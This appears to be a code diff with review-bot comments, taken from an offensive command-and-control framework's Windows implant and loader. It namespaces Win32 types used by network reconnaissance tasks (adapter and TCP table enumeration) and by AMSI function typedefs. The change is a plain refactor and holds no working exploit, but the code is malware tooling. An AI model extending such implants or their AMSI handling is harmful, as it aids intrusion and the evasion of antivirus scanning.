+ Win32::PIP_ADAPTER_ADDRESSES_LH pCurrAddresses = NULL;
+ Win32::PIP_ADAPTER_UNICAST_ADDRESS pUnicast = NULL;
+ Win32::PIP_ADAPTER_ANYCAST_ADDRESS pAnycast = NULL;
+ Win32::PIP_ADAPTER_MULTICAST_ADDRESS pMulticast = NULL;
+ Win32::IP_ADAPTER_DNS_SERVER_ADDRESS* pDnsServer = NULL;
+ Win32::PIP_ADAPTER_GATEWAY_ADDRESS_LH pGateway = NULL;
+ Win32::IP_ADAPTER_PREFIX *pPrefix = NULL;
 // Allocate a 15KB buffer to start with.
 outBufLen = WORKING_BUFFER_SIZE;
 do
 {
- pAddresses = (IP_ADAPTER_ADDRESSES_LH*)MALLOC(outBufLen);
+ pAddresses = (Win32::IP_ADAPTER_ADDRESSES_LH*)MALLOC(outBufLen);
 if (pAddresses == NULL)
 {
 return L"Error: Could not allocate memory for addresses";
@@ -42,7 +42,7 @@ namespace Task
 family,
 flags,
 NULL,
- (PIP_ADAPTER_ADDRESSES)pAddresses,
+ (Win32::PIP_ADAPTER_ADDRESSES)pAddresses,
 &outBufLen
 );
 if (dwRetVal == ERROR_BUFFER_OVERFLOW)
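Review bot: The cast in the new `(Win32::PIP_ADAPTER_ADDRESSES)pAddresses` argument is a no-op: win32.hpp declares `PIP_ADAPTER_ADDRESSES` as `IP_ADAPTER_ADDRESSES_LH *`, which is exactly the declared type of `pAddresses`, so the line can simply read `pAddresses,`. The same holds for `(Win32::PIP_ADAPTER_UNICAST_ADDRESS)pCurrAddresses->FirstUnicastAddress` in the @@ -72 hunk, where `FirstUnicastAddress` is already a `PIP_ADAPTER_UNICAST_ADDRESS_LH`. Where a cast is genuinely needed — the `MALLOC(outBufLen)` result here and net.cpp's `MALLOC(sizeof(Win32::MIB_TCPTABLE))` / `MALLOC(ulSize)` — prefer `static_cast<Win32::IP_ADAPTER_ADDRESSES_LH*>(MALLOC(outBufLen))` over the C-style form, assuming `MALLOC` yields a `void*`, so that a later type change is rejected by the compiler instead of being silently reinterpreted. The enclosing function begins before and ends after these hunks.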
@@ -72,7 +72,7 @@ namespace Task
 // result += L"IfIndex (IPv4 Interface): " + ConvertDWORDToWstring(pCurrAddresses->IfIndex) + L"\n";
 // result += L"Adapter Name: " + UTF8Decode(std::string(pCurrAddresses->AdapterName)) + L"\n";
- pUnicast = (PIP_ADAPTER_UNICAST_ADDRESS)pCurrAddresses->FirstUnicastAddress;
+ pUnicast = (Win32::PIP_ADAPTER_UNICAST_ADDRESS)pCurrAddresses->FirstUnicastAddress;
 if (pUnicast)
 {
 result += L"IPv4 Addresses:\n";
diff --git a/payload/win/implant/src/core/task/net.cpp b/payload/win/implant/src/core/task/net.cpp
index b2b5bdf..0a6f655 100644
--- a/payload/win/implant/src/core/task/net.cpp
+++ b/payload/win/implant/src/core/task/net.cpp
@@ -6,7 +6,7 @@ namespace Task
 {
 std::wstring result = L"";
- PMIB_TCPTABLE pTcpTable;
+ Win32::PMIB_TCPTABLE pTcpTable;
 ULONG ulSize = 0;
 DWORD dwRetVal = 0;
@@ -17,19 +17,19 @@ namespace Task
 int i;
- pTcpTable = (MIB_TCPTABLE*)MALLOC(sizeof(MIB_TCPTABLE));
+ pTcpTable = (Win32::MIB_TCPTABLE*)MALLOC(sizeof(Win32::MIB_TCPTABLE));
 if (pTcpTable == NULL)
 {
 return L"Error: Could not allocate memory for TCP table.";
 }
- ulSize = sizeof(MIB_TCPTABLE);
+ ulSize = sizeof(Win32::MIB_TCPTABLE);
 // Make an initial call to GetTcpTable to get the necessary size into the ulSize variable.
 if ((dwRetVal = pState->pProcs->lpGetTcpTable(pTcpTable, &ulSize, TRUE)) == ERROR_INSUFFICIENT_BUFFER)
 {
 FREE(pTcpTable);
- pTcpTable = (MIB_TCPTABLE*)MALLOC(ulSize);
+ pTcpTable = (Win32::MIB_TCPTABLE*)MALLOC(ulSize);
 if (pTcpTable == NULL)
 {
 return L"Error: Could not allocate memory for TCP table.";
@@ -120,40 +120,40 @@ namespace Task
 // Status
 switch (pTcpTable->table[i].dwState)
 {
- case MIB_TCP_STATE_CLOSED:
+ case Win32::MIB_TCP_STATE_CLOSED:
 result += L"CLOSED\n";
 break;
- case MIB_TCP_STATE_LISTEN:
+ case Win32::MIB_TCP_STATE_LISTEN:
 result += L"LISTEN\n";
 break;
- case MIB_TCP_STATE_SYN_SENT:
+ case Win32::MIB_TCP_STATE_SYN_SENT:
 result += L"SYN-SENT\n";
 break;
- case MIB_TCP_STATE_SYN_RCVD:
+ case Win32::MIB_TCP_STATE_SYN_RCVD:
 result += L"SYN-RECEIVED\n";
 break;
- case MIB_TCP_STATE_ESTAB:
+ case Win32::MIB_TCP_STATE_ESTAB:
 result += L"ESTABLISHED\n";
 break;
- case MIB_TCP_STATE_FIN_WAIT1:
+ case Win32::MIB_TCP_STATE_FIN_WAIT1:
 result += L"FIN-WAIT-1\n";
 break;
- case MIB_TCP_STATE_FIN_WAIT2:
+ case Win32::MIB_TCP_STATE_FIN_WAIT2:
 result += L"FIN-WAIT-2\n";
 break;
- case MIB_TCP_STATE_CLOSE_WAIT:
+ case Win32::MIB_TCP_STATE_CLOSE_WAIT:
 result += L"CLOSE-WAIT\n";
 break;
- case MIB_TCP_STATE_CLOSING:
+ case Win32::MIB_TCP_STATE_CLOSING:
 result += L"CLOSING\n";
 break;
- case MIB_TCP_STATE_LAST_ACK:
+ case Win32::MIB_TCP_STATE_LAST_ACK:
 result += L"LAST-ACK\n";
 break;
- case MIB_TCP_STATE_TIME_WAIT:
+ case Win32::MIB_TCP_STATE_TIME_WAIT:
 result += L"TIME-WAIT\n";
 break;
- case MIB_TCP_STATE_DELETE_TCB:
+ case Win32::MIB_TCP_STATE_DELETE_TCB:
 result += L"DELETE-TCB\n";
 break;
 default:
diff --git a/payload/win/loader/include/core/procs.hpp b/payload/win/loader/include/core/procs.hpp
index a43de12..b57cad6 100644
--- a/payload/win/loader/include/core/procs.hpp
+++ b/payload/win/loader/include/core/procs.hpp
@@ -240,7 +240,7 @@ namespace Procs
 // AdjustTokenPrivileges
 typedef BOOL (WINAPI* LPPROC_ADJUSTTOKENPRIVILEGES)(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
 // AmsiScanBuffer
- typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT *result);
+ typedef HRESULT (WINAPI* LPPROC_AMSISCANBUFFER)(Win32::HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, Win32::HAMSISESSION amsiSession, Win32::AMSI_RESULT *result);
 // BCryptCloseAlgorithmProvider
 typedef NTSTATUS (WINAPI* LPPROC_BCRYPTCLOSEALGORITHMPROVIDER)(BCRYPT_ALG_HANDLE hAlgorithm, ULONG dwFlags);
 // BCryptDecrypt
diff --git a/payload/win/loader/include/core/win32.hpp b/payload/win/loader/include/core/win32.hpp
index eefbfb2..23513da 100644
--- a/payload/win/loader/include/core/win32.hpp
+++ b/payload/win/loader/include/core/win32.hpp
@@ -1,15 +1,18 @@
 #ifndef HERMIT_CORE_WIN32_HPP
 #define HERMIT_CORE_WIN32_HPP
-typedef HANDLE HAMSICONTEXT;
-typedef HANDLE HAMSISESSION;
+namespace Win32
+{
+ typedef HANDLE HAMSICONTEXT;
+ typedef HANDLE HAMSISESSION;
-typedef enum {
- AMSI_RESULT_CLEAN,
- AMSI_RESULT_NOT_DETECTED,
- AMSI_RESULT_BLOCKED_BY_ADMIN_START,
- AMSI_RESULT_BLOCKED_BY_ADMIN_END,
- AMSI_RESULT_DETECTED
-} AMSI_RESULT;
+ typedef enum {
+ AMSI_RESULT_CLEAN,
+ AMSI_RESULT_NOT_DETECTED,
+ AMSI_RESULT_BLOCKED_BY_ADMIN_START,
+ AMSI_RESULT_BLOCKED_BY_ADMIN_END,
+ AMSI_RESULT_DETECTED
+ } AMSI_RESULT;
+}
 #endif // HERMIT_CORE_WIN32_HPP
\ No newline at end of file
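Review bot: This loader header and the implant's `payload/win/implant/include/core/win32.hpp` now both declare `Win32::HAMSICONTEXT`, `Win32::HAMSISESSION` and `Win32::AMSI_RESULT` under the identical include guard `HERMIT_CORE_WIN32_HPP`. That is harmless while loader and implant are separate builds, but the two copies can drift silently, and a translation unit that ever included both would see only the first; a short comment on this copy naming the implant header as the source of truth, or factoring the shared AMSI declarations into one header both targets include, would make the intent explicit. The file still ends without a trailing newline (`\ No newline at end of file`), which is worth fixing while the file is being touched.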